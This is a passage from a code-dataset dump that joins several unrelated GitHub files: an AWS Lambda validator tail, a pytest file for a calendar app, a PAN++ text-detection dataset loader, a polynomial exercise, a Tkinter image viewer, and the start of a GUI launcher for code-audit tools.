= json.loads(file_content)\n Datafile = pd.DataFrame(Jsondata)\n Commodity_value = Datafile['Commodity'].iloc[0]\n print(Commodity_value)\n if Commodity_value == 0:\n Validate_elec(Datafile, bucket, customer)\n if Commodity_value == 1:\n Validate_gas(Datafile, bucket, customer)\n s3.Object(bucket, customer + '/' + outputFolder + '/' + key.split(\"/\")[2]).put(\n Body=content_object.get()['Body'].read())\n s3.Object(bucket, key).delete()\n except:\n s3.Object(bucket, customer + '/' + failedFolder + '/' + key.split(\"/\")[2]).put(\n Body=content_object.get()['Body'].read())\n s3.Object(bucket, key).delete()\n\n return {\n 'statusCode': 200,\n 'body': json.dumps('Hello from Lambda!')\n }\n","repo_name":"bimalkeeth/convertor","sub_path":"convertor_lambda/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74208857379","text":"import datetime\n\nimport pytest\n\nfrom app.internal.celebrity import get_today_month_and_day\n\nCELEBRITY_ROUTE = \"/celebrity\"\nFAKE_TIME = datetime.date(2018, 9, 18)\n\nBAD_DATES = [\n datetime.date(2021, 1, 1),\n datetime.date(1789, 7, 14),\n datetime.date(1776, 7, 4),\n datetime.date(1945, 1, 27),\n datetime.date(2000, 10, 16),\n]\n\nGOOD_DATES = [\n datetime.date(2020, 9, 18),\n datetime.date(2019, 9, 18),\n datetime.date(2016, 9, 18),\n]\n\n\n@pytest.fixture\ndef datetime_mock(monkeypatch):\n class MockDateTime:\n\n @staticmethod\n def today():\n return FAKE_TIME\n\n monkeypatch.setattr(datetime, 'date', MockDateTime)\n\n\n@pytest.mark.parametrize('date', BAD_DATES)\ndef test_get_today_month_and_day_bad(date, datetime_mock):\n assert get_today_month_and_day() != date.strftime(\"%m-%d\")\n\n\n@pytest.mark.parametrize('date', GOOD_DATES)\ndef test_get_today_month_and_day_good(date, datetime_mock):\n assert get_today_month_and_day() == date.strftime(\"%m-%d\")\n\n\ndef test_celebrity_page_exists(client):\n response = client.get(CELEBRITY_ROUTE)\n assert response.ok\n assert b'born today' in response.content\n","repo_name":"PythonFreeCourse/calendar","sub_path":"tests/test_celebrity.py","file_name":"test_celebrity.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"35"} +{"seq_id":"25913817095","text":"import math\nimport random\nimport string\n\nimport cv2\nimport mmcv\nimport numpy as np\nimport Polygon as plg\nimport pyclipper\nimport scipy.io as scio\nimport torch\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom torch.utils import data\n\nfrom .coco_text import COCO_Text\n\nEPS = 1e-6\nsynth_root_dir = './data/SynthText/'\nsynth_train_data_dir = synth_root_dir\nsynth_train_gt_path = synth_root_dir + 'gt.mat'\n\nic17_root_dir = './data/ICDAR2017MLT/'\nic17_train_data_dir = ic17_root_dir + 'ch8_training_images/'\nic17_train_gt_dir = ic17_root_dir + \\\n 'ch8_training_localization_transcription_gt_v2/'\n\nct_root_dir = './data/COCO-Text/'\nct_train_data_dir = ct_root_dir + 'train2014/'\nct_train_gt_path = ct_root_dir + 'COCO_Text.json'\n\nic15_root_dir = './data/ICDAR2015/Challenge4/'\nic15_train_data_dir = ic15_root_dir + 'ch4_training_images/'\nic15_train_gt_dir = ic15_root_dir + \\\n 'ch4_training_localization_transcription_gt/'\n\ntt_root_dir = './data/total_text/'\ntt_train_data_dir = tt_root_dir + 'Images/Train/'\ntt_train_gt_dir = tt_root_dir + 'Groundtruth/Polygon/Train/'\n\n\ndef get_img(img_path, read_type='cv2'):\n 
try:\n if read_type == 'cv2':\n img = cv2.imread(img_path)\n img = img[:, :, [2, 1, 0]]\n elif read_type == 'pil':\n img = np.array(Image.open(img_path))\n except Exception:\n print(img_path)\n raise\n return img\n\n\ndef check(s):\n for c in s:\n if c in list(string.printable[:-6]):\n continue\n return False\n return True\n\n\ndef get_ann_synth(img, gts, texts, index):\n bboxes = np.array(gts[index])\n bboxes = np.reshape(bboxes, (bboxes.shape[0], bboxes.shape[1], -1))\n bboxes = bboxes.transpose(2, 1, 0)\n bboxes = np.reshape(\n bboxes, (bboxes.shape[0], -1)) / ([img.shape[1], img.shape[0]] * 4)\n\n words = []\n for text in texts[index]:\n text = text.replace('\\n', ' ').replace('\\r', ' ')\n words.extend([w for w in text.split(' ') if len(w) > 0])\n\n return bboxes, words\n\n\ndef get_ann_ic17(img, gt_path):\n h, w = img.shape[0:2]\n lines = mmcv.list_from_file(gt_path)\n bboxes = []\n words = []\n for line in lines:\n line = line.encode('utf-8').decode('utf-8-sig')\n line = line.replace('\\xef\\xbb\\xbf', '')\n gt = line.split(',')\n word = gt[9].replace('\\r', '').replace('\\n', '')\n\n if len(word) == 0 or word[0] == '#':\n words.append('###')\n elif not check(word):\n words.append('???')\n else:\n words.append(word)\n\n bbox = [int(gt[i]) for i in range(8)]\n bbox = np.array(bbox) / ([w * 1.0, h * 1.0] * 4)\n bboxes.append(bbox)\n return np.array(bboxes), words\n\n\ndef get_ann_ct(img, anns):\n h, w = img.shape[0:2]\n bboxes = []\n words = []\n for ann in anns:\n bbox = ann['polygon']\n bbox = np.array(bbox) / ([w * 1.0, h * 1.0] * (len(bbox) // 2))\n bboxes.append(bbox)\n\n if 'utf8_string' not in ann:\n words.append('###')\n else:\n word = ann['utf8_string']\n if not check(word):\n words.append('???')\n else:\n words.append(word)\n\n return np.array(bboxes), words\n\n\ndef get_ann_ic15(img, gt_path):\n h, w = img.shape[0:2]\n lines = mmcv.list_from_file(gt_path)\n bboxes = []\n words = []\n for line in lines:\n line = line.encode('utf-8').decode('utf-8-sig')\n line = line.replace('\\xef\\xbb\\xbf', '')\n gt = line.split(',')\n word = gt[8].replace('\\r', '').replace('\\n', '')\n if word[0] == '#':\n words.append('###')\n else:\n words.append(word)\n\n bbox = [int(gt[i]) for i in range(8)]\n bbox = np.array(bbox) / ([w * 1.0, h * 1.0] * 4)\n bboxes.append(bbox)\n return np.array(bboxes), words\n\n\ndef get_ann_tt(img, gt_path):\n h, w = img.shape[0:2]\n bboxes = []\n words = []\n\n data = scio.loadmat(gt_path)\n data_polygt = data['polygt']\n for i, lines in enumerate(data_polygt):\n X = np.array(lines[1])\n Y = np.array(lines[3])\n\n point_num = len(X[0])\n word = lines[4]\n if len(word) == 0:\n word = '???'\n else:\n word = word[0]\n # word = word[0].encode(\"utf-8\")\n\n if word == '#':\n word = '###'\n\n words.append(word)\n\n arr = np.concatenate([X, Y]).T\n bbox = []\n for i in range(point_num):\n bbox.append(arr[i][0])\n bbox.append(arr[i][1])\n bbox = np.asarray(bbox) / ([w * 1.0, h * 1.0] * point_num)\n bboxes.append(bbox)\n\n return bboxes, words\n\n\ndef random_horizontal_flip(imgs):\n if random.random() < 0.5:\n for i in range(len(imgs)):\n imgs[i] = np.flip(imgs[i], axis=1).copy()\n return imgs\n\n\ndef random_rotate(imgs):\n max_angle = 10\n angle = random.random() * 2 * max_angle - max_angle\n for i in range(len(imgs)):\n img = imgs[i]\n w, h = img.shape[:2]\n rotation_matrix = cv2.getRotationMatrix2D((h / 2, w / 2), angle, 1)\n img_rotation = cv2.warpAffine(img,\n rotation_matrix, (h, w),\n flags=cv2.INTER_NEAREST)\n imgs[i] = img_rotation\n return imgs\n\n\ndef 
scale_aligned(img, h_scale, w_scale):\n h, w = img.shape[0:2]\n h = int(h * h_scale + 0.5)\n w = int(w * w_scale + 0.5)\n if h % 32 != 0:\n h = h + (32 - h % 32)\n if w % 32 != 0:\n w = w + (32 - w % 32)\n img = cv2.resize(img, dsize=(w, h))\n return img\n\n\ndef random_scale(img, min_size, short_size=736):\n h, w = img.shape[0:2]\n\n scale = np.random.choice(np.array([0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3]))\n scale = (scale * short_size) / min(h, w)\n\n aspect = np.random.choice(np.array([0.9, 0.95, 1.0, 1.05, 1.1]))\n h_scale = scale * math.sqrt(aspect)\n w_scale = scale / math.sqrt(aspect)\n # print (h_scale, w_scale, h_scale / w_scale)\n\n img = scale_aligned(img, h_scale, w_scale)\n return img\n\n\ndef random_crop_padding(imgs, target_size):\n \"\"\"using padding and the final crop size is (800, 800)\"\"\"\n h, w = imgs[0].shape[0:2]\n t_w, t_h = target_size\n p_w, p_h = target_size\n if w == t_w and h == t_h:\n return imgs\n\n t_h = t_h if t_h < h else h\n t_w = t_w if t_w < w else w\n\n if random.random() > 3.0 / 8.0 and np.max(imgs[1]) > 0:\n # make sure to crop the text region\n tl = np.min(np.where(imgs[1] > 0), axis=1) - (t_h, t_w)\n tl[tl < 0] = 0\n br = np.max(np.where(imgs[1] > 0), axis=1) - (t_h, t_w)\n br[br < 0] = 0\n br[0] = min(br[0], h - t_h)\n br[1] = min(br[1], w - t_w)\n\n i = random.randint(tl[0], br[0]) if tl[0] < br[0] else 0\n j = random.randint(tl[1], br[1]) if tl[1] < br[1] else 0\n else:\n i = random.randint(0, h - t_h) if h - t_h > 0 else 0\n j = random.randint(0, w - t_w) if w - t_w > 0 else 0\n\n n_imgs = []\n for idx in range(len(imgs)):\n if len(imgs[idx].shape) == 3:\n s3_length = int(imgs[idx].shape[-1])\n img = imgs[idx][i:i + t_h, j:j + t_w, :]\n img_p = cv2.copyMakeBorder(img,\n 0,\n p_h - t_h,\n 0,\n p_w - t_w,\n borderType=cv2.BORDER_CONSTANT,\n value=tuple(0\n for i in range(s3_length)))\n else:\n img = imgs[idx][i:i + t_h, j:j + t_w]\n img_p = cv2.copyMakeBorder(img,\n 0,\n p_h - t_h,\n 0,\n p_w - t_w,\n borderType=cv2.BORDER_CONSTANT,\n value=(0,))\n n_imgs.append(img_p)\n return n_imgs\n\n\ndef update_word_mask(instance, instance_before_crop, word_mask):\n labels = np.unique(instance)\n\n for label in labels:\n if label == 0:\n continue\n ind = instance == label\n if np.sum(ind) == 0:\n word_mask[label] = 0\n continue\n ind_before_crop = instance_before_crop == label\n # print(np.sum(ind), np.sum(ind_before_crop))\n if float(np.sum(ind)) / np.sum(ind_before_crop) > 0.9:\n continue\n word_mask[label] = 0\n\n return word_mask\n\n\ndef dist(a, b):\n return np.linalg.norm((a - b), ord=2, axis=0)\n\n\ndef perimeter(bbox):\n peri = 0.0\n for i in range(bbox.shape[0]):\n peri += dist(bbox[i], bbox[(i + 1) % bbox.shape[0]])\n return peri\n\n\ndef shrink(bboxes, rate, max_shr=20):\n rate = rate * rate\n shrinked_bboxes = []\n for bbox in bboxes:\n area = plg.Polygon(bbox).area()\n peri = perimeter(bbox)\n\n try:\n pco = pyclipper.PyclipperOffset()\n pco.AddPath(bbox, pyclipper.JT_ROUND, pyclipper.ET_CLOSEDPOLYGON)\n offset = min(int(area * (1 - rate) / (peri + 0.001) + 0.5),\n max_shr)\n\n shrinked_bbox = pco.Execute(-offset)\n if len(shrinked_bbox) == 0:\n shrinked_bboxes.append(bbox)\n continue\n\n shrinked_bbox = np.array(shrinked_bbox[0])\n if shrinked_bbox.shape[0] <= 2:\n shrinked_bboxes.append(bbox)\n continue\n\n shrinked_bboxes.append(shrinked_bbox)\n except Exception:\n print('area:', area, 'peri:', peri)\n shrinked_bboxes.append(bbox)\n\n return shrinked_bboxes\n\n\ndef get_vocabulary(voc_type, EOS='EOS', PADDING='PAD', UNKNOWN='UNK'):\n if 
voc_type == 'LOWERCASE':\n voc = list(string.digits + string.ascii_lowercase)\n elif voc_type == 'ALLCASES':\n voc = list(string.digits + string.ascii_letters)\n elif voc_type == 'ALLCASES_SYMBOLS':\n voc = list(string.printable[:-6])\n else:\n raise KeyError('voc_type must be one of \"LOWERCASE\", '\n '\"ALLCASES\", \"ALLCASES_SYMBOLS\"')\n\n # update the voc with specifical chars\n voc.append(EOS)\n voc.append(PADDING)\n voc.append(UNKNOWN)\n\n char2id = dict(zip(voc, range(len(voc))))\n id2char = dict(zip(range(len(voc)), voc))\n\n return voc, char2id, id2char\n\n\nclass PAN_PP_Joint_Train(data.Dataset):\n def __init__(self,\n split='train',\n is_transform=False,\n img_size=None,\n short_size=736,\n kernel_scale=0.5,\n with_rec=False,\n read_type='pil',\n report_speed=False,\n debug=False):\n self.split = split\n self.is_transform = is_transform and not debug\n\n self.img_size = img_size if (\n img_size is None or isinstance(img_size, tuple)) else (img_size,\n img_size)\n self.kernel_scale = kernel_scale\n self.short_size = short_size\n self.for_rec = with_rec\n self.read_type = read_type\n self.report_speed = report_speed\n self.debug = debug\n\n self.img_paths = {}\n self.gts = {}\n self.texts = {}\n\n self.img_num = 0\n # synth\n data = scio.loadmat(synth_train_gt_path)\n self.img_paths['synth'] = data['imnames'][0]\n self.gts['synth'] = data['wordBB'][0]\n self.texts['synth'] = data['txt'][0]\n self.img_num += len(self.img_paths['synth'])\n\n # ic17\n self.img_paths['ic17'] = []\n self.gts['ic17'] = []\n img_names = [\n img_name\n for img_name in mmcv.utils.scandir(ic17_train_data_dir, '.jpg')\n ]\n img_names.extend([\n img_name\n for img_name in mmcv.utils.scandir(ic17_train_data_dir, '.png')\n ])\n for idx, img_name in enumerate(img_names):\n img_path = ic17_train_data_dir + img_name\n self.img_paths['ic17'].append(img_path)\n\n gt_name = 'gt_' + img_name.split('.')[0] + '.txt'\n gt_path = ic17_train_gt_dir + gt_name\n self.gts['ic17'].append(gt_path)\n self.img_num += len(self.img_paths['ic17'])\n\n # coco_text\n self.ct = COCO_Text(ct_train_gt_path)\n self.img_paths['ct'] = self.ct.getImgIds(imgIds=self.ct.train,\n catIds=[('legibility',\n 'legible')])\n self.img_num += len(self.img_paths['ct'])\n\n # ic15\n self.img_paths['ic15'] = []\n self.gts['ic15'] = []\n img_names = [\n img_name\n for img_name in mmcv.utils.scandir(ic15_train_data_dir, '.jpg')\n ]\n img_names.extend([\n img_name\n for img_name in mmcv.utils.scandir(ic15_train_data_dir, '.png')\n ])\n for idx, img_name in enumerate(img_names):\n img_path = ic15_train_data_dir + img_name\n self.img_paths['ic15'].append(img_path)\n\n gt_name = 'gt_' + img_name.split('.')[0] + '.txt'\n gt_path = ic15_train_gt_dir + gt_name\n self.gts['ic15'].append(gt_path)\n self.img_num += len(self.img_paths['ic15'])\n\n # tt\n self.img_paths['tt'] = []\n self.gts['tt'] = []\n img_names = [\n img_name\n for img_name in mmcv.utils.scandir(tt_train_data_dir, '.jpg')\n ]\n img_names.extend([\n img_name\n for img_name in mmcv.utils.scandir(tt_train_data_dir, '.png')\n ])\n\n for idx, img_name in enumerate(img_names):\n img_path = tt_train_data_dir + img_name\n self.img_paths['tt'].append(img_path)\n\n gt_name = 'poly_gt_' + img_name.split('.')[0] + '.mat'\n gt_path = tt_train_gt_dir + gt_name\n self.gts['tt'].append(gt_path)\n self.img_num += len(self.img_paths['tt'])\n\n self.voc, self.char2id, self.id2char = get_vocabulary('LOWERCASE')\n self.max_word_num = 200\n self.max_word_len = 32\n print('reading type: %s.' 
% self.read_type)\n\n def __len__(self):\n return self.img_num\n\n def load_synth_single(self, index):\n img_path = synth_train_data_dir + self.img_paths['synth'][index][0]\n img = get_img(img_path, self.read_type)\n bboxes, words = get_ann_synth(img, self.gts['synth'],\n self.texts['synth'], index)\n return img, bboxes, words\n\n def load_ic17_single(self, index):\n img_path = self.img_paths['ic17'][index]\n gt_path = self.gts['ic17'][index]\n img = get_img(img_path, self.read_type)\n bboxes, words = get_ann_ic17(img, gt_path)\n return img, bboxes, words\n\n def load_ct_single(self, index):\n img_meta = self.ct.loadImgs(self.img_paths['ct'][index])[0]\n img_path = ct_train_data_dir + img_meta['file_name']\n img = get_img(img_path, self.read_type)\n\n annIds = self.ct.getAnnIds(imgIds=img_meta['id'])\n anns = self.ct.loadAnns(annIds)\n bboxes, words = get_ann_ct(img, anns)\n\n return img, bboxes, words\n\n def load_ic15_single(self, index):\n img_path = self.img_paths['ic15'][index]\n gt_path = self.gts['ic15'][index]\n img = get_img(img_path, self.read_type)\n bboxes, words = get_ann_ic15(img, gt_path)\n return img, bboxes, words\n\n def load_tt_single(self, index):\n img_path = self.img_paths['tt'][index]\n gt_path = self.gts['tt'][index]\n img = get_img(img_path, self.read_type)\n bboxes, words = get_ann_tt(img, gt_path)\n return img, bboxes, words\n\n def __getitem__(self, index):\n choice = random.random()\n\n if self.debug:\n # index = 0\n img, bboxes, words = self.load_ic15_single(index)\n elif choice < 1.0 / 5.0:\n index = random.randint(0, len(self.img_paths['synth']) - 1)\n img, bboxes, words = self.load_synth_single(index)\n elif choice < 2.0 / 5.0:\n index = random.randint(0, len(self.img_paths['ic17']) - 1)\n img, bboxes, words = self.load_ic17_single(index)\n elif choice < 3.0 / 5.0:\n index = random.randint(0, len(self.img_paths['ct']) - 1)\n img, bboxes, words = self.load_ct_single(index)\n elif choice < 4.0 / 5.0:\n index = random.randint(0, len(self.img_paths['ic15']) - 1)\n img, bboxes, words = self.load_ic15_single(index)\n else:\n index = random.randint(0, len(self.img_paths['tt']) - 1)\n img, bboxes, words = self.load_tt_single(index)\n\n if len(bboxes) > self.max_word_num:\n bboxes = bboxes[:self.max_word_num]\n words = words[:self.max_word_num]\n\n gt_words = np.full((self.max_word_num + 1, self.max_word_len),\n self.char2id['PAD'],\n dtype=np.int32)\n word_mask = np.zeros((self.max_word_num + 1,), dtype=np.int32)\n for i, word in enumerate(words):\n if word == '###':\n continue\n if word == '???':\n continue\n word = word.lower()\n gt_word = np.full((self.max_word_len,),\n self.char2id['PAD'],\n dtype=np.int)\n for j, char in enumerate(word):\n if j > self.max_word_len - 1:\n break\n if char in self.char2id:\n gt_word[j] = self.char2id[char]\n else:\n gt_word[j] = self.char2id['UNK']\n if len(word) > self.max_word_len - 1:\n gt_word[-1] = self.char2id['EOS']\n else:\n gt_word[len(word)] = self.char2id['EOS']\n gt_words[i + 1] = gt_word\n word_mask[i + 1] = 1\n\n if self.is_transform:\n img = random_scale(img, self.img_size[0], self.short_size)\n\n gt_instance = np.zeros(img.shape[0:2], dtype='uint8')\n training_mask = np.ones(img.shape[0:2], dtype='uint8')\n if len(bboxes) > 0:\n if type(bboxes) == list:\n for i in range(len(bboxes)):\n bboxes[i] = np.reshape(\n bboxes[i] * ([img.shape[1], img.shape[0]] *\n (bboxes[i].shape[0] // 2)),\n (bboxes[i].shape[0] // 2, 2)).astype('int32')\n else:\n bboxes = np.reshape(\n bboxes * ([img.shape[1], img.shape[0]] *\n 
(bboxes.shape[1] // 2)),\n (bboxes.shape[0], -1, 2)).astype('int32')\n for i in range(len(bboxes)):\n cv2.drawContours(gt_instance, [bboxes[i]], -1, i + 1, -1)\n if words[i] == '###':\n cv2.drawContours(training_mask, [bboxes[i]], -1, 0, -1)\n\n gt_kernels = []\n for rate in [self.kernel_scale]:\n gt_kernel = np.zeros(img.shape[0:2], dtype='uint8')\n kernel_bboxes = shrink(bboxes, rate)\n for i in range(len(bboxes)):\n cv2.drawContours(gt_kernel, [kernel_bboxes[i]], -1, 1, -1)\n gt_kernels.append(gt_kernel)\n\n if self.is_transform:\n imgs = [img, gt_instance, training_mask]\n imgs.extend(gt_kernels)\n\n if not self.for_rec:\n imgs = random_horizontal_flip(imgs)\n imgs = random_rotate(imgs)\n gt_instance_before_crop = imgs[1].copy()\n imgs = random_crop_padding(imgs, self.img_size)\n img, gt_instance, training_mask, gt_kernels = \\\n imgs[0], imgs[1], imgs[2], imgs[3:]\n word_mask = update_word_mask(gt_instance, gt_instance_before_crop,\n word_mask)\n\n gt_text = gt_instance.copy()\n gt_text[gt_text > 0] = 1\n gt_kernels = np.array(gt_kernels)\n\n max_instance = np.max(gt_instance)\n gt_bboxes = np.zeros((self.max_word_num + 1, 4), dtype=np.int32)\n for i in range(1, max_instance + 1):\n ind = gt_instance == i\n if np.sum(ind) == 0:\n continue\n points = np.array(np.where(ind)).transpose((1, 0))\n tl = np.min(points, axis=0)\n br = np.max(points, axis=0) + 1\n gt_bboxes[i] = (tl[0], tl[1], br[0], br[1])\n\n if self.is_transform:\n img = Image.fromarray(img)\n img = img.convert('RGB')\n img = transforms.ColorJitter(brightness=32.0 / 255,\n saturation=0.5)(img)\n else:\n img = Image.fromarray(img)\n img = img.convert('RGB')\n\n img = transforms.ToTensor()(img)\n img = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])(img)\n\n gt_text = torch.from_numpy(gt_text).long()\n gt_kernels = torch.from_numpy(gt_kernels).long()\n training_mask = torch.from_numpy(training_mask).long()\n gt_instance = torch.from_numpy(gt_instance).long()\n gt_bboxes = torch.from_numpy(gt_bboxes).long()\n gt_words = torch.from_numpy(gt_words).long()\n word_mask = torch.from_numpy(word_mask).long()\n\n data = dict(\n imgs=img,\n gt_texts=gt_text,\n gt_kernels=gt_kernels,\n training_masks=training_mask,\n gt_instances=gt_instance,\n gt_bboxes=gt_bboxes,\n )\n if self.for_rec:\n data.update(dict(gt_words=gt_words, word_masks=word_mask))\n\n return data\n\n\nif __name__ == '__main__':\n data_loader = PAN_PP_Joint_Train(split='train',\n is_transform=True,\n img_size=736,\n short_size=736,\n kernel_scale=0.5,\n read_type='pil',\n with_rec=True)\n train_loader = torch.utils.data.DataLoader(data_loader,\n batch_size=8,\n shuffle=False,\n num_workers=8,\n drop_last=True,\n pin_memory=True)\n for item in train_loader:\n print('-' * 20)\n for k, v in item.items():\n print(f'k: {k}, v.shape: {v.shape}')\n","repo_name":"whai362/pan_pp.pytorch","sub_path":"dataset/pan_pp/pan_pp_joint_train.py","file_name":"pan_pp_joint_train.py","file_ext":"py","file_size_in_byte":22864,"program_lang":"python","lang":"en","doc_type":"code","stars":426,"dataset":"github-code","pt":"35"} +{"seq_id":"9031613808","text":"import random as r\nclass myclass:\n \"\"\"Напишите программу с классом, объекты которого можно вызывать. У объекта класса должно быть поле-список с числовыми значениями,\nа результатом метод возвращает полиномиальную сумму. 
In particular, if the list contains the numbers a0, a1, …, an and the value x is passed as an argument when the object is called, then the result returned must be a0 + a1*x + a2*x^2 + … + an*x^n.\"\"\"\n    def __call__(self,x):\n        s=0\n        n=0\n        for i in self.list1:\n            s+=i*(x**n)\n            n+=1\n        return s\n    \n\n    \nA=myclass()\nA.list1=[1,2,3,4]\nx=3\nprint(f\"The polynomial sum for the list {A.list1} and x={x} is: {A(x)}.\")\n\n","repo_name":"AntonUpro/Learn-Python","sub_path":"chapter 9/task 8.py","file_name":"task 8.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"26793659723","text":"from tkinter import *\nfrom tkinter.filedialog import *\nfrom tkinter.simpledialog import *\nimport os.path\nimport math\n\n## Function declarations ##\ndef loadImage(fname) :\n    global window, canvas, paper, filename, XSIZE, YSIZE, inImage\n\n    inImage=[]\n    fsize = os.path.getsize(fname) # file size in bytes\n    XSIZE = YSIZE = int(math.sqrt(fsize)) # assume a square image and derive its side length\n    \n    fp = open(fname, 'rb') \n\n    for i in range(0, XSIZE) :\n        tmpList = []\n        for k in range(0, YSIZE) :\n            data = int(ord(fp.read(1)))\n            tmpList.append(data)\n        inImage.append(tmpList)\n\n    fp.close()\n\ndef displayImage(image) :\n    global window, canvas, paper, filename, XSIZE, YSIZE, inImage\n    for i in range(0, XSIZE) :\n        for k in range(0, YSIZE) :\n            data = image[i][k]\n            paper.put(\"#%02x%02x%02x\" % (data,data,data), (k, i))\n\ndef func_open() :\n    global window, canvas, paper, filename, XSIZE, YSIZE, inImage\n\n    filename = askopenfilename(parent = window, filetypes = ((\"RAW files\", \"*.raw\"), (\"All files\", \"*.*\")))\n    if filename == '' : # Cancel was pressed in the dialog\n        return\n    \n    if canvas != None : # remove the canvas if one was opened before\n        canvas.destroy()\n\n    # file --> memory\n    loadImage(filename)\n    \n    window.geometry(str(XSIZE) + 'x' + str(YSIZE)) # window size\n    canvas = Canvas(window, height = XSIZE, width = YSIZE)\n    paper = PhotoImage(width = XSIZE, height = YSIZE)\n    canvas.create_image( (XSIZE / 2, YSIZE / 2), image = paper, state = \"normal\")\n    \n    # memory --> screen \n    displayImage(inImage)\n    \n    canvas.pack()\n\ndef func_exit() :\n    window.quit()\n    window.destroy()\n\ndef brightPhoto() :\n    global window, canvas, paper, filename, XSIZE, YSIZE, inImage\n    value = 0\n    value = askinteger('Brighten', 'Enter a value', minvalue = 1, maxvalue = 255)\n\n    for i in range(0, XSIZE) :\n        for k in range(0, YSIZE) :\n            data = inImage[i][k] + value\n            if data > 255 :\n                newData = 255\n            else :\n                newData = data\n            inImage[i][k] = newData\n\n    displayImage(inImage)\n\ndef darkPhoto() :\n    global window, canvas, paper, filename, XSIZE, YSIZE, inImage\n    value = 0\n    value = askinteger('Darken', 'Enter a value', minvalue = 1, maxvalue = 255)\n\n    for i in range(0, XSIZE) :\n        for k in range(0, YSIZE) :\n            data = inImage[i][k] - value\n            if data < 0 :\n                newData = 0\n            else :\n                newData = data\n            inImage[i][k] = newData\n\n    displayImage(inImage)\n\ndef reversePhoto() :\n    global window, canvas, paper, filename, XSIZE, YSIZE, inImage\n\n    for i in range(0, XSIZE) :\n        for k in range(0, YSIZE) :\n            data = inImage[i][k]\n            newData = 255 - data\n            inImage[i][k] = newData\n\n    displayImage(inImage)\n\n## Global variables ##\nwindow = None\ncanvas = None\nXSIZE, YSIZE=0, 0\ninImage = [] # 2-D list (in-memory image)\nfilename = '' # file name (global)\n\n## Main code ##\nif __name__ == \"__main__\" :\n    window=Tk()\n    window.title(\"Grayscale Photo Viewer (Menu)\")\n    \n    # add the menus\n    mainMenu = Menu(window)\n    window.config(menu=mainMenu)\n    fileMenu = Menu(mainMenu)
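    # Build the menu bar: each cascade is registered on mainMenu, then its command entries are attached below.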
\n    mainMenu.add_cascade(label = \"File\", menu = fileMenu)\n    fileMenu.add_command(label = \"Open File\", command = func_open)\n    fileMenu.add_separator()\n    fileMenu.add_command(label = \"Exit Program\", command = func_exit)\n\n    photoMenu = Menu(mainMenu)\n    mainMenu.add_cascade(label = \"Photo Effects\", menu = photoMenu)\n    photoMenu.add_command(label = \"Brighten\", command = brightPhoto)\n    photoMenu.add_command(label = \"Darken\", command = darkPhoto)\n    photoMenu.add_command(label = \"Invert Image\", command = reversePhoto)\n\n    window.mainloop()\n","repo_name":"Leeyoungsup/python_pratice","sub_path":"출석과제10/Ex11-02.py","file_name":"Ex11-02.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"36297505041","text":"from tkinter import *\r\nfrom tkintertoolbox import *\r\nimport Homologous_detection\r\nimport Bugdetectionuniversalframe\r\nimport CFG\r\nimport stack0verf10w\r\nimport formatstring\r\nimport intsign\r\nimport subcontent\r\n\r\n\r\nclass window(object):\r\n\t\"\"\"description of class\"\"\"\r\n\tdef deploymainwindow(self):\r\n\t\troot=Tk()\r\n\t\troot.resizable(width=False, height=False)\r\n\t\tself.tktool=tkintertoolbox()\r\n\t\tcenter_window(root,500,300)\r\n\t\troot.title(\"SoftWare SEC\")\r\n\t\tfr1=Frame(root)\r\n\t\tButton(fr1,text=\"Source Code Audit\",command=self.deployHomologousDetection,width=16).grid(row=0,column=0)\r\n\t\tButton(fr1,text=\"Source Code Audit - CFG\",command=self.deployCFG,width=16).grid(row=0,column=1)\r\n\t\tButton(fr1,text=\"Stack Overflow Check\",command=self.deployoverflow,width=16).grid(row=0,column=2)\r\n\t\tButton(fr1,text=\"Format String\",command=self.deployformat,width=16).grid(row=1,column=0)\r\n\t\tButton(fr1,text=\"Integer Sign Overflow (With Multiprocess)\",command=self.deployintsign,width=16).grid(row=1,column=1)\r\n\t\tButton(fr1,text=\"DLC\",command=self.deploydlc,width=16).grid(row=1,column=2)\r\n\t\tfr2=Frame(root)\r\n\t\tButton(fr2,text=\"Quit\",command=root.destroy,width=8).pack(side='right',padx=10)\r\n\t\tButton(fr2,text=\"Info\",command=self.deployinfowindow,width=8).pack(side='right',padx=10)\r\n\t\tfr3=Frame(root)\r\n\t\tButton(fr3,text=\"Empty pointer\",width=8).pack(padx=5)\r\n\t\tButton(fr3,text=\"Empty pointer\",width=8).pack(padx=5)\r\n\t\tfr1.pack(pady=10,anchor='center')\r\n\t\tfr2.pack(pady=10,anchor='center')\r\n\t\troot.mainloop()\r\n\tdef deployinfowindow(self):\r\n\t\troot=Tk()\r\n\t\troot.title(\"Info\")\r\n\t\troot.resizable(width=False, height=False)\r\n\t\ttkintertoolbox.center_window(root,300,200)\r\n\t\ttextfr=Frame(root)\r\n\t\tLabel(textfr,text=\"Designed by Iridium\\nhttps://github.com/POTASSIUM7429\\n19/8~19/9\\n\",borderwidth=3, relief=\"groove\").pack(side='right')\r\n\t\tbotfr=Frame(root)\r\n\t\tButton(botfr,text=\"Exit\",command=root.destroy,width=8).pack()\r\n\t\ttextfr.pack(pady=10)\r\n\t\tbotfr.pack(pady=10)\r\n\t\troot.mainloop()\r\n\r\n\tdef deployHomologousDetection(self):\r\n\t\ts1=Homologous_detection.Homologous_detection()\r\n\r\n\tdef deployCFG(self):\r\n\t\ts2=CFG.CFG()\r\n\r\n\tdef deployoverflow(self):\r\n\t\ts3=stack0verf10w.overflowdetection()\r\n\tdef deployformat(self):\r\n\t\ts4=formatstring.formatdetection()\r\n\tdef deployintsign(self):\r\n\t\ts5=intsign.intsign()\r\n
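\t# Each deploy* handler below simply instantiates its tool window; the DLC one also tears down the tool's worker pool.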
